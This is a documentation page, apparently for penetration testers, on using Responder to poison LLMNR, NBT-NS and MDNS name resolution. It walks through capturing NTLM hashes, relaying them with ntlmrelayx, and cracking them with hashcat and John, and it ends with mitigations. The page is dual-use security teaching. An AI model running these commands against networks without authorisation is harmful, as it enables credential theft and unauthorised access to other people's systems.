Documentation
Responder

Responder

Responder Usage Guide

Responder is a powerful tool used by penetration testers to capture NTLMv1/NTLMv2 hashes from network services through poisoning protocols such as LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and MDNS (Multicast DNS). It can also relay captured credentials to further exploit the network. This guide provides step-by-step instructions on how to install and use Responder for network analysis and exploitation.

1. Installing Responder

Responder is included in most penetration testing distributions, such as Kali Linux. If you don’t already have it, you can install it as follows:

Installation on Kali Linux or Ubuntu: 

sudo apt update
sudo apt install responder

If using a system where Responder is not pre-installed:

git clone https://github.com/SpiderLabs/Responder.git
cd Responder

2. Understanding Responder’s Capabilities

Responder works by listening on the network and poisoning name resolution requests from protocols like LLMNR, NBT-NS, and MDNS. When a user or machine tries to resolve a non-existent host, Responder responds with its IP, tricking the victim into authenticating and sending credentials that can be captured or relayed.

Common attack techniques Responder can perform:

  • LLMNR/NBT-NS Poisoning: Captures authentication credentials through network response spoofing.
  • SMB/HTTP Relay Attacks: Captures and relays authentication to another service for further exploitation.
  • Capturing NTLMv1/NTLMv2 Hashes: Stores the captured credentials for later cracking.

3. Basic Usage

Once installed, you can run Responder to begin listening on an interface and capture credentials. The basic command for starting Responder is:

sudo responder -I <interface>
  • -I : This option tells Responder which network interface to listen on (e.g., eth0, wlan0).

Example: 

sudo responder -I eth0

This will start Responder on the eth0 interface, and it will begin poisoning requests for LLMNR, NBT-NS, and MDNS by default.

4. Responder Configuration

Responder’s behavior can be configured using the Responder.conf file. You can specify which services to enable or disable based on your testing needs.

Default Configuration File Location: 

nano /etc/responder/Responder.conf

Key services you can configure in Responder.conf:

  • SMB: Captures SMB credentials (enabled by default).
  • HTTP: Captures HTTP authentication.
  • FTP/IMAP/LDAP/MSSQL/POP3: Captures credentials from other protocols.
  • DNS Spoofing: Disabled by default; you can enable it to poison DNS responses.

Modify the file by enabling/disabling specific services by setting On or Off in the Responder.conf file.

Example: 

[Responder Core]
; If you want Responder to respond to these name services requests
; Set this to On or Off.
LLMNR = On
NBT-NS = On
MDNS = Off
DNS = Off
SMB = On
HTTP = On
HTTPS = On

5. Capturing Hashes with Responder

Once Responder is running, it will passively capture and log any credentials that are sent to it. When a victim attempts to resolve a host and Responder responds, the NTLM hash (or another form of credentials) will be captured.

Responder’s output will look like this for captured hashes:

[SMB] NTLMv2-SSP Hash captured from <IP Address>
[SMB] Username: domain\user
[SMB] NTLMv2 Hash: <HASH>

The captured hashes are stored in a log file in the Responder directory (e.g., /usr/share/responder/logs/).

Example of starting Responder and capturing SMB hashes: 

sudo responder -I eth0

Once you run this, Responder listens and captures authentication attempts over SMB, HTTP, and other protocols based on your configuration.

6. Relaying Credentials (SMB Relay)

In some cases, captured NTLM hashes can be relayed to other systems to perform actions such as gaining unauthorized access or escalating privileges. To relay NTLM credentials, you can combine Responder with NTLMRelayX (part of the Impacket suite).

Responder includes a built-in SMB relay attack option, but it’s generally more common to use NTLMRelayX for advanced relaying techniques.

Here’s a basic example using NTLMRelayX:

  1. Start Responder in capture-only mode:

    sudo responder -I eth0 -rdw
    • -r Disables answers for NetBIOS requests.
    • -d Disables answers for DHCP requests.
    • -w Disables answers for WINS requests.

  2. Start NTLMRelayX to relay to another service:

    sudo ntlmrelayx.py -tf targets.txt -smb2support
    • -tf targets.txt: A list of target machines to which you want to relay credentials.
    • -smb2support: Enables support for SMBv2.

Responder will capture NTLM credentials, and NTLMRelayX will relay them to the target specified in targets.txt.

7. Analyzing Results and Hash Cracking

After capturing NTLMv1/NTLMv2 hashes, the next step may be to crack them to recover the plaintext password. You can use tools like John the Ripper or Hashcat to attempt password cracking.

Cracking with Hashcat:

Save the captured hash in a file (e.g., hashes.txt) and use the following command:

hashcat -m 5600 hashes.txt /path/to/wordlist.txt
  • -m 5600: Specifies NTLMv2 hash mode.
  • hashes.txt: File containing the captured hashes.
  • /path/to/wordlist.txt: Path to a wordlist for cracking (e.g., rockyou.txt).

Cracking with John the Ripper:

John the Ripper can also be used to crack captured hashes:

john --format=netntlmv2 hashes.txt --wordlist=/path/to/wordlist.txt

8. Best Practices and Recommendations

  1. Mitigating Responder Attacks:

    • Disable LLMNR and NBT-NS: The most effective way to mitigate Responder attacks is to disable LLMNR and NBT-NS on your network.
    • Enforce SMB Signing: Enforcing SMB signing on your network helps prevent attackers from relaying SMB authentication traffic.
    • Enable LDAP/SMB Signing: Sign LDAP and SMB communication to prevent relay attacks.

  2. Disabling LLMNR on Windows:

    • Open Group Policy Editor (gpedit.msc).
    • Navigate to: Computer Configuration > Administrative Templates > Network > DNS Client.
    • Set Turn Off Multicast Name Resolution to Enabled.

  3. Disabling NBT-NS:

    • Open Control Panel > Network and Sharing Center > Change adapter settings.
    • Right-click on your network interface, select Properties.
    • Uncheck Client for Microsoft Networks or manually disable NetBIOS over TCP/IP.

9. Conclusion

Responder is a versatile tool for capturing credentials via name resolution poisoning techniques. Properly configuring and running Responder can allow a penetration tester to gain valuable NTLM hashes, which can be relayed or cracked to gain unauthorized access to systems. To mitigate these types of attacks, organizations should disable LLMNR, NBT-NS, and enforce SMB signing across their networks.

By understanding how to use Responder effectively, you can elevate your penetration testing activities and help secure networks against common misconfigurations.

USHE DocsImpacket